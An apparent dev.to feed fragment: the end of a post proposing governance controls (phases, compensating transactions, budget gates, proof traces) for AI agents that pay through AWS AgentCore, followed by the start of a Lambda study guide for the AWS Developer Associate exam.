&lt;p&gt;AgentCore enforces per-session spending limits. But a spending limit is a ceiling, not a policy. There's no lifecycle enforcement that prevents an agent from paying during exploration, before it's decided what to do with the data.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The scenario:&lt;/strong&gt; An agent exploring data sources pays $0.02 each to five different paid endpoints during its research phase. It doesn't yet know which source it needs. Three of those calls turn out to be irrelevant. The agent paid $0.06 for data it never used, and it hadn't even formed a plan yet. Nothing in the spending-limit model distinguishes "exploring options with someone else's money" from "executing a committed decision."&lt;/p&gt;

&lt;p&gt;Even if AgentCore handles retry and rate limiting at the transport layer, a governance gap lives above transport: the agent chose to spend before it decided what to build. That's not a retry problem. That's a phase problem.&lt;/p&gt;

&lt;p&gt;What's needed: &lt;strong&gt;phases&lt;/strong&gt;. The agent can't call payment tools until it's finished reading and has committed to a plan. Not "shouldn't." Cannot. An exception fires.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;EXPLORE ──→ DECIDE ──→ COMMIT
(read only)  (propose)  (pay + act)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Gap 2: What happens when a multi-step workflow fails after money moved?
&lt;/h3&gt;

&lt;p&gt;Payments are irreversible. If an agent pays for data in step 1, then step 2 (analysis) fails, the user paid for nothing. The report never arrives. No compensation mechanism exists at the orchestration layer.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The scenario:&lt;/strong&gt; Pay for market data, analyze it, send report. Model timeout on step 2. Payment already executed. Report never generated. User charged $0.05 for zero value.&lt;/p&gt;

&lt;p&gt;What's needed: &lt;strong&gt;transactions with compensation&lt;/strong&gt;. If step 2 fails, step 1's compensation fires (refund, credit, or at minimum a structured record that the payment delivered no value). Temporal and Inngest solve durable execution for workflows, but they're not integrated into the agent tool-calling loop where payment decisions happen.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Pseudocode: transactional agent workflow
&lt;/span&gt;&lt;span class="k"&gt;with&lt;/span&gt; &lt;span class="n"&gt;agent&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;commit&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="n"&gt;tx&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="n"&gt;data&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;tx&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;call&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;pay_for_data&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;cost&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mf"&gt;0.05&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;endpoint&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;market-feed&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="n"&gt;result&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;tx&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;call&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;analyze&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;cost&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mf"&gt;0.01&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="n"&gt;tx&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;call&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;send_report&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;cost&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mf"&gt;0.10&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;to&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;user_email&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="c1"&gt;# if analyze fails → pay_for_data compensation fires
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Databases solved this in 1978. Durable execution engines solved it for workflows. The agent tool-calling loop is the layer still missing it.&lt;/p&gt;

&lt;h3&gt;
  
  
  Gap 3: Who decides the threshold for approval?
&lt;/h3&gt;

&lt;p&gt;A flat session limit doesn't distinguish between "50 calls at $0.01" and "1 call at $2.40." Both are under a $5 budget. One might need human approval.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The scenario:&lt;/strong&gt; An agent discovers a premium data source mid-execution. Single call: $2.40. Session limit is $10. Within bounds. But nobody approved spending $2.40 on a single API call for a task that was expected to cost $0.30 total.&lt;/p&gt;

&lt;p&gt;What's needed: &lt;strong&gt;graduated budget gates&lt;/strong&gt; that change agent behavior at thresholds, not just stop execution at a ceiling. At 50%, the agent reduces scope and picks cheaper sources. At 75%, new payment commits are blocked and the agent re-evaluates. Above 90%, full stop. Plus per-call approval rules: any single payment above $0.50 requires explicit authorization. The budget gate is behavioral, not binary.&lt;/p&gt;

&lt;h3&gt;
  
  
  Gap 4: Why was this payment permitted?
&lt;/h3&gt;

&lt;p&gt;AgentCore provides observability: logs, metrics, traces showing what happened. But "what happened" isn't the same as "why was it allowed." When a payment goes wrong, you need the decision chain: which rules were evaluated, what phase the agent was in, whether approval was required.&lt;/p&gt;

&lt;p&gt;What's needed: &lt;strong&gt;proof traces&lt;/strong&gt;. A structured record for every payment decision.&lt;/p&gt;

&lt;p&gt;Here's what a &lt;em&gt;blocked&lt;/em&gt; payment looks like (this is where the value is visible):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Decision: DENIED
Tool: pay_for_data
✗ Phase is EXPLORE (payment tools require COMMIT)
  Agent must transition to DECIDE → COMMIT before paying
  Action: PhaseError raised, tool call rejected
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;And a permitted one with conditions:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Decision: ALLOWED (with approval)
Tool: pay_for_data
✓ Phase is COMMIT
✓ Transaction T1 is open
✓ Budget: 12% spent, below all thresholds
⚠ Cost $0.50 exceeds $0.25 threshold → approval required
✓ Approval granted by callback
Executed in 0.003s
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;When something goes wrong, you know whether the system allowed it or failed to prevent it. That's the difference between a bug and a governance gap.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F88crxdemkw1yd9ymuckg.gif" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F88crxdemkw1yd9ymuckg.gif" alt=" " width="505" height="220"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Why hasn't AWS built this?
&lt;/h2&gt;

&lt;p&gt;Fair question. Three possible reasons:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;It's coming in GA.&lt;/strong&gt; The preview focuses on payment execution. Governance features (approval workflows, phase enforcement) may ship later. AWS tends to launch primitives first, then layer policy on top.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;They expect frameworks to own it.&lt;/strong&gt; LangGraph, CrewAI, Strands Agents, and others are building orchestration. AWS may see governance as the framework's job, not the infrastructure's.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;The market signal isn't there yet.&lt;/strong&gt; Few agents transact in production today. The governance pain hasn't been felt widely enough to drive demand.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;All three are plausible. But if you're building a paying agent today, you can't wait for option 1 or 2 to materialize. The gap exists now.&lt;/p&gt;

&lt;h2&gt;
  
  
  A governance pattern for paying agents
&lt;/h2&gt;

&lt;p&gt;The four pieces work together:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Phases&lt;/strong&gt; prevent premature payments (gap 1)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Transactions&lt;/strong&gt; protect multi-step workflows (gap 2)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Budget gates&lt;/strong&gt; enforce graduated spending policy (gap 3)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Proof traces&lt;/strong&gt; record why every payment was permitted or denied (gap 4)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The rules that govern these should be readable by the people responsible for spending policy:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;BLOCK pay_for_data WHEN phase IS NOT commit
BLOCK * WHEN budget ABOVE 90%
REQUIRE APPROVAL FOR * WHEN cost ABOVE 0.50
FLAG * WHEN time OUTSIDE 09:00-17:00
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This isn't natural language. An engineer still needs to write it. But a product manager can read it and confirm it matches the policy they intended.&lt;/p&gt;

&lt;h2&gt;
  
  
  Reference implementation
&lt;/h2&gt;

&lt;p&gt;I built a single-file Python library that implements this pattern: phases, transactions, budget gates, proof traces, and the rule DSL above. Zero dependencies. MIT licensed.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://github.com/vidanov/shape" rel="noopener noreferrer"&gt;Shape on GitHub&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;It wraps any tool-calling agent (LangGraph, CrewAI, Strands, raw Python) with external governance. It's not a framework and it's not competing with AgentCore. It fills the gap between "the agent can pay" and "the agent should be allowed to pay right now." Whether you build that yourself, use Shape, or wait for AWS to ship it, the pattern is the same.&lt;/p&gt;

&lt;p&gt;AWS built the payment rails. The governance layer is still your problem.&lt;/p&gt;




&lt;p&gt;&lt;strong&gt;Links:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://aws.amazon.com/blogs/machine-learning/agents-that-transact-introducing-amazon-bedrock-agentcore-payments-built-with-coinbase-and-stripe/" rel="noopener noreferrer"&gt;AWS announcement: Agents that transact&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://docs.aws.amazon.com/bedrock-agentcore/latest/devguide/payments.html" rel="noopener noreferrer"&gt;AgentCore payments documentation&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/vidanov/shape" rel="noopener noreferrer"&gt;Shape: governance for AI agents&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.x402.org/" rel="noopener noreferrer"&gt;x402 protocol&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>aws</category>
      <category>ai</category>
      <category>agentcore</category>
      <category>payments</category>
    </item>
    <item>
      <title>Develop Code for Lambda | 🏗️ Build A Real-Time Data Processing Pipeline</title>
      <dc:creator>Ntombizakhona Mabaso</dc:creator>
      <pubDate>Thu, 07 May 2026 20:34:21 +0000</pubDate>
      <link>https://dev.to/aws-builders/develop-code-for-lambda-build-a-real-time-data-processing-pipeline-iii</link>
      <guid>https://dev.to/aws-builders/develop-code-for-lambda-build-a-real-time-data-processing-pipeline-iii</guid>
      <description>&lt;p&gt;&lt;strong&gt;Exam Guide:&lt;/strong&gt; Developer - Associate&lt;br&gt;
&lt;strong&gt;🏗️ Domain 1:&lt;/strong&gt;  &lt;strong&gt;&lt;em&gt;Development with AWS Services&lt;/em&gt;&lt;/strong&gt;&lt;br&gt;
📘 &lt;strong&gt;Task 2:&lt;/strong&gt; &lt;em&gt;Develop Code for Lambda&lt;/em&gt;       &lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Lambda is the most heavily tested service on the DVA-C02. It is also perhaps, one of the most used and talked about services in general too, well after EC2 and S3. So, you need to know how to configure it, write code for it, handle errors, tune performance, and integrate it with practically every other AWS service.&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;


&lt;h2&gt;
  
  
  📘Concepts
&lt;/h2&gt;
&lt;h3&gt;
  
  
  Lambda Execution Model
&lt;/h3&gt;

&lt;p&gt;When you invoke a Lambda function, AWS:&lt;br&gt;
&lt;strong&gt;1.&lt;/strong&gt; Finds or creates an &lt;em&gt;execution environment&lt;/em&gt; (container)&lt;br&gt;
&lt;strong&gt;2.&lt;/strong&gt; Loads your code and initializes it (&lt;em&gt;cold start&lt;/em&gt;)&lt;br&gt;
&lt;strong&gt;3.&lt;/strong&gt; Runs your &lt;em&gt;handler function&lt;/em&gt;&lt;br&gt;
&lt;strong&gt;4.&lt;/strong&gt; Keeps the environment &lt;em&gt;warm&lt;/em&gt; for reuse (subsequent invocations skip step 2)&lt;/p&gt;

&lt;p&gt;Code outside the handler runs once during cold start and is reused. This is why you initialize SDK clients and database connections outside the handler.&lt;/p&gt;
&lt;h3&gt;
  
  
  Key Configuration Parameters
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Parameter&lt;/th&gt;
&lt;th&gt;Range&lt;/th&gt;
&lt;th&gt;Default&lt;/th&gt;
&lt;th&gt;&lt;strong&gt;Notes&lt;/strong&gt;&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Memory&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;128 MB – 10,240 MB&lt;/td&gt;
&lt;td&gt;128 MB&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;CPU scales proportionally with memory&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Timeout&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;1s – 900s (15 min)&lt;/td&gt;
&lt;td&gt;3s&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Max 15 minutes: use Step Functions or ECS for longer or Durable functions&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Concurrency&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Reserved or Provisioned&lt;/td&gt;
&lt;td&gt;1000/region&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Reserved = guarantee + cap; Provisioned = pre-warmed&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Ephemeral storage&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;512 MB – 10,240 MB&lt;/td&gt;
&lt;td&gt;512 MB&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;/tmp directory for temporary files&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Layers&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Up to 5&lt;/td&gt;
&lt;td&gt;—&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;250 MB total unzipped (function + layers)&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;h3&gt;
  
  
  Invocation Types and Error Handling
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Invocation Type&lt;/th&gt;
&lt;th&gt;Source Examples&lt;/th&gt;
&lt;th&gt;Retry Behavior&lt;/th&gt;
&lt;th&gt;&lt;strong&gt;Error Destination&lt;/strong&gt;&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Synchronous&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;API Gateway, ALB&lt;/td&gt;
&lt;td&gt;No automatic retries caller handles it&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Caller gets the error&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Asynchronous&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;S3, SNS, EventBridge&lt;/td&gt;
&lt;td&gt;2 automatic retries (3 total)&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;DLQ or Lambda Destinations&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Event source mapping&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;SQS, Kinesis, DynamoDB Streams&lt;/td&gt;
&lt;td&gt;Retries until record expires or succeeds&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;DLQ (SQS) or on-failure destination&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;h3&gt;
  
  
  Lambda Destinations vs DLQ
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;&lt;strong&gt;Feature&lt;/strong&gt;&lt;/th&gt;
&lt;th&gt;DLQ&lt;/th&gt;
&lt;th&gt;Lambda Destinations&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Captures success&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Captures failure&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Context included&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Minimal&lt;/td&gt;
&lt;td&gt;Full (request, response, error)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Supported targets&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;SQS, SNS&lt;/td&gt;
&lt;td&gt;SQS, SNS, Lambda, EventBridge&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Works with&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Async invocations&lt;/td&gt;
&lt;td&gt;Async invocations&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Lambda Destinations are the modern approach and preferred over DLQs. DLQs are still valid for SQS event source mappings.&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;
  
  
  VPC Access
&lt;/h3&gt;

&lt;p&gt;By default, Lambda runs in an AWS-managed VPC and can access the internet and public AWS services. When you attach Lambda to your own VPC:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Without VPC:  Lambda → Internet → AWS Services ✅  |  Lambda → Private RDS ❌
With VPC:     Lambda → Private RDS ✅  |  Lambda → Internet ❌ (needs NAT Gateway)
              Lambda → VPC Endpoint → AWS Services ✅
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Key Points:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;1.&lt;/strong&gt; VPC Lambda needs &lt;em&gt;private subnets&lt;/em&gt; with a &lt;em&gt;NAT Gateway&lt;/em&gt; for internet access&lt;br&gt;
&lt;strong&gt;2.&lt;/strong&gt; Use &lt;em&gt;VPC endpoints&lt;/em&gt; (PrivateLink) to access DynamoDB, S3, SQS without NAT&lt;br&gt;
&lt;strong&gt;3.&lt;/strong&gt; Use &lt;em&gt;RDS Proxy&lt;/em&gt; for connection pooling because Lambda can overwhelm databases with concurrent connections&lt;/p&gt;
&lt;h3&gt;
  
  
  Cold Starts
&lt;/h3&gt;

&lt;p&gt;A cold start happens when Lambda creates a new execution environment. Strategies to reduce them:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;1.&lt;/strong&gt; &lt;em&gt;Provisioned Concurrency:&lt;/em&gt; pre-warms environments (costs money when idle)&lt;br&gt;
&lt;strong&gt;2.&lt;/strong&gt; &lt;em&gt;Keep deployment packages small:&lt;/em&gt; smaller packages initialize faster&lt;br&gt;
&lt;strong&gt;3.&lt;/strong&gt; &lt;em&gt;Initialize outside the handler:&lt;/em&gt; SDK clients, DB connections, config&lt;br&gt;
&lt;strong&gt;4.&lt;/strong&gt; &lt;em&gt;Use ARM (Graviton2):&lt;/em&gt; often faster and 20% cheaper&lt;/p&gt;
&lt;h3&gt;
  
  
  Kinesis And Lambda Key Settings
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Setting&lt;/th&gt;
&lt;th&gt;What It Does&lt;/th&gt;
&lt;th&gt;&lt;em&gt;Relevance&lt;/em&gt;&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Batch size&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Records per invocation (max 10,000)&lt;/td&gt;
&lt;td&gt;&lt;em&gt;Larger batches = fewer invocations&lt;/em&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Batch window&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Wait time to fill batch (max 300s)&lt;/td&gt;
&lt;td&gt;&lt;em&gt;Reduces invocations for low-traffic streams&lt;/em&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;strong&gt;Parallelization factor&lt;/strong&gt; (1–10)&lt;/td&gt;
&lt;td&gt;Concurrent batches per shard&lt;/td&gt;
&lt;td&gt;&lt;em&gt;Increases throughput without adding shards&lt;/em&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Bisect batch on error&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Splits batch in half on failure&lt;/td&gt;
&lt;td&gt;&lt;em&gt;Isolates the bad record&lt;/em&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Starting position&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;LATEST or TRIM_HORIZON&lt;/td&gt;
&lt;td&gt;&lt;em&gt;LATEST = new only. TRIM_HORIZON = from beginning&lt;/em&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;


&lt;h2&gt;
  
  
  🏗️ Build A Real Time Data Processing Pipeline
&lt;/h2&gt;

&lt;p&gt;Now let's put these concepts into practice by building a &lt;strong&gt;Real-Time Data Processing Pipeline&lt;/strong&gt; using Lambda:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;A Lambda function with VPC access connecting to an RDS database&lt;/li&gt;
&lt;li&gt;Lambda layers for shared dependencies&lt;/li&gt;
&lt;li&gt;A DLQ (Dead Letter Queue) and Lambda Destinations for error handling&lt;/li&gt;
&lt;li&gt;A Kinesis stream processor that transforms data in near real time&lt;/li&gt;
&lt;li&gt;Performance tuning with memory configuration&lt;/li&gt;
&lt;/ul&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;This covers all the skills for this task: Lambda configuration, VPC access, error handling, event lifecycle, integrations, and performance tuning.&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2&gt;
  
  
  Prerequisites
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://ntombizakhona.medium.com/amazon-web-services-a8e57a9c6084" rel="noopener noreferrer"&gt;&lt;strong&gt;An AWS account&lt;/strong&gt;&lt;/a&gt; &lt;em&gt;(free tier covers most of this)&lt;/em&gt;
&lt;/li&gt;
&lt;/ul&gt;


&lt;h2&gt;
  
  
  Part I
&lt;/h2&gt;
&lt;h3&gt;
  
  
  Create and Configure a Lambda Function
&lt;/h3&gt;
&lt;h4&gt;
  
  
  &lt;strong&gt;Create the Function&lt;/strong&gt;
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Step 01:&lt;/strong&gt; Open the &lt;strong&gt;Lambda&lt;/strong&gt; &lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 02: **Click **Create function&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 03:&lt;/strong&gt; &lt;strong&gt;Create function&lt;/strong&gt;&lt;br&gt;
Choose &lt;strong&gt;Author from scratch&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Function name:&lt;/strong&gt; &lt;code&gt;DataProcessor&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Runtime:&lt;/strong&gt; Python 3.12&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Click &lt;strong&gt;Create function&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;✅Green banner:&lt;/strong&gt; Successfully created the function "DataProcessor".&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;em&gt;Before writing code, let's walk through the configuration tabs.&lt;/em&gt; &lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;strong&gt;Step 04:&lt;/strong&gt; Click the &lt;strong&gt;Configuration&lt;/strong&gt; tab.&lt;br&gt;
&lt;strong&gt;General configuration&lt;/strong&gt;&lt;br&gt;
Click &lt;strong&gt;Edit&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Memory:&lt;/strong&gt; 256 MB &lt;em&gt;(default is 128 MB)&lt;/em&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Ephemeral storage:&lt;/strong&gt; 512 MB &lt;em&gt;(default)&lt;/em&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Timeout:&lt;/strong&gt; 0 min 30 sec &lt;em&gt;(default is 3 seconds)&lt;/em&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Click &lt;strong&gt;Save&lt;/strong&gt;.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Lambda allocates CPU proportionally to memory. At 1,769 MB you get one full vCPU. Increasing memory from 128 MB to 256 MB doubles your CPU therefore your function might run in half the time, costing the same or less.&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;strong&gt;Step 05:&lt;/strong&gt; &lt;strong&gt;Environment variables&lt;/strong&gt;&lt;br&gt;
Click &lt;strong&gt;Environment variables&lt;/strong&gt; → &lt;strong&gt;Edit&lt;/strong&gt; → &lt;strong&gt;Add environment variable&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Key: &lt;code&gt;LOG_LEVEL&lt;/code&gt;, Value: &lt;code&gt;INFO&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;Key: &lt;code&gt;STAGE&lt;/code&gt;, Value: &lt;code&gt;dev&lt;/code&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Click &lt;strong&gt;Save&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;✅Green banner:&lt;/strong&gt; Successfully updated the function "DataProcessor".&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;os&lt;/span&gt;

&lt;span class="c1"&gt;# Access environment variables in your code
